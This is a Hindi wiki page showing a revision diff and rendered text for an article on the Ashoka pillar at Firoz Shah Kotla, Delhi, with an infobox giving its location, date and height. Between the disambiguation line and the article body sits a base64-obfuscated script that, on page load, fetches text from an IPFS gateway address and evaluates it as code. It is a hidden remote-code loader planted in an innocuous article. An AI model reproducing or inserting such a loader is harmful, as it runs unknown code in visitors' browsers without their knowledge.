Difference between revisions of "अशोक स्तम्भ दिल्ली"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(5 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 
{{बहुविकल्प|बहुविकल्पी शब्द=अशोक स्तम्भ|लेख का नाम=अशोक स्तम्भ}}
 
{{बहुविकल्प|बहुविकल्पी शब्द=अशोक स्तम्भ|लेख का नाम=अशोक स्तम्भ}}
;अशोक स्तम्भ फ़िरोज़शाह कोटला
+
{{सूचना बक्सा संक्षिप्त परिचय
[[दिल्ली]] का यह [[अशोक स्तम्भ]] तीन शताब्दी ईसा पूर्व भारतीय उपमहाद्वीप में महान सम्राट [[अशोक]] द्वारा बनवाए गये भगवान [[बुद्ध]] की शिक्षाओं पर [[शिलालेख|शिलालेखों]] की एक श्रृंखला है।  
+
|चित्र=Ashoka-pillar-delhi.jpg
* 13.1 मीटर लम्बा यह स्तम्भ पोलिश किये हुए बलुआ पत्थर से बना हुआ है जो तीन शताब्दी ईसा पूर्व का है और यह फिरोजशाह द्वारा [[अम्बाला]] से उठवाकर दिल्ली लाया गया है।
+
|चित्र का नाम=अशोक स्तम्भ दिल्ली
 +
|विवरण= महान् सम्राट [[अशोक]] द्वारा बनवाए गये भगवान [[बुद्ध]] की शिक्षाओं पर [[शिलालेख|शिलालेखों]] की एक श्रृंखला है।
 +
|शीर्षक 1=स्थान
 +
|पाठ 1=[[दिल्ली]], [[भारत]]
 +
|शीर्षक 2=स्थापना
 +
|पाठ 2=300 ईसा पूर्व
 +
|शीर्षक 3=
 +
|पाठ 3=
 +
|शीर्षक 4=
 +
|पाठ 4=
 +
|शीर्षक 5=
 +
|पाठ 5=
 +
|शीर्षक 6=
 +
|पाठ 6=
 +
|शीर्षक 7=
 +
|पाठ 7=
 +
|शीर्षक 8=
 +
|पाठ 8=
 +
|शीर्षक 9=
 +
|पाठ 9=
 +
|शीर्षक 10=
 +
|पाठ 10=
 +
|संबंधित लेख=
 +
|अन्य जानकारी=13.1 मीटर लम्बा यह स्तम्भ पॉलिश किये हुए बलुआ पत्थर से बना हुआ है जो तीन [[शताब्दी]] ईसा पूर्व का है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
[[दिल्ली]] का यह [[अशोक स्तम्भ]] तीन [[शताब्दी]] ईसा पूर्व भारतीय उपमहाद्वीप में [[अशोक|महान् सम्राट अशोक]] द्वारा बनवाए गये भगवान [[बुद्ध]] की शिक्षाओं पर [[शिलालेख|शिलालेखों]] की एक श्रृंखला है।  
 +
* 13.1 मीटर लम्बा यह स्तम्भ पोलिश किये हुए बलुआ पत्थर से बना हुआ है जो तीन शताब्दी ईसा पूर्व का है और यह '''फिरोजशाह''' द्वारा [[अम्बाला]] से उठवाकर दिल्ली लाया गया है।
 +
* यह स्तम्भ फ़िरोज़शाह कोटला, दिल्ली में स्थित है।
 
;अशोक स्तम्भ बारा हिन्दूराव अस्पताल   
 
;अशोक स्तम्भ बारा हिन्दूराव अस्पताल   
 
यह स्तम्भ बारा हिंदूराव अस्पताल और चौबुरजी मस्जिद के बीच स्थित है।
 
यह स्तम्भ बारा हिंदूराव अस्पताल और चौबुरजी मस्जिद के बीच स्थित है।
Line 13: Line 42:
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
*[http://samratashokclub.com/?page_id=15 सम्राट अशोक क्लब]
 +
 
==संबंधित लेख==
 
==संबंधित लेख==
{{दिल्ली}}
+
{{अशोक स्तम्भ}}{{दिल्ली}}
 
[[Category:अशोक स्तम्भ]]
 
[[Category:अशोक स्तम्भ]]
 
[[Category:दिल्ली]][[Category:दिल्ली के पर्यटन स्थल]] [[Category:पर्यटन कोश]]
 
[[Category:दिल्ली]][[Category:दिल्ली के पर्यटन स्थल]] [[Category:पर्यटन कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 13:07, 3 May 2018

chitr:Disamb2.jpg ashok stambh ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- ashok stambh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ashok stambh dilli
vivaran mahanh samrat ashok dvara banavae gaye bhagavan buddh ki shikshaoan par shilalekhoan ki ek shrriankhala hai.
sthan dilli, bharat
sthapana 300 eesa poorv
any janakari 13.1 mitar lamba yah stambh p aaulish kiye hue balua patthar se bana hua hai jo tin shatabdi eesa poorv ka hai.

dilli ka yah ashok stambh tin shatabdi eesa poorv bharatiy upamahadvip mean mahanh samrat ashok dvara banavae gaye bhagavan buddh ki shikshaoan par shilalekhoan ki ek shrriankhala hai.

  • 13.1 mitar lamba yah stambh polish kiye hue balua patthar se bana hua hai jo tin shatabdi eesa poorv ka hai aur yah phirojashah dvara ambala se uthavakar dilli laya gaya hai.
  • yah stambh firozashah kotala, dilli mean sthit hai.
ashok stambh bara hindoorav aspatal

yah stambh bara hiandoorav aspatal aur chauburaji masjid ke bich sthit hai.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh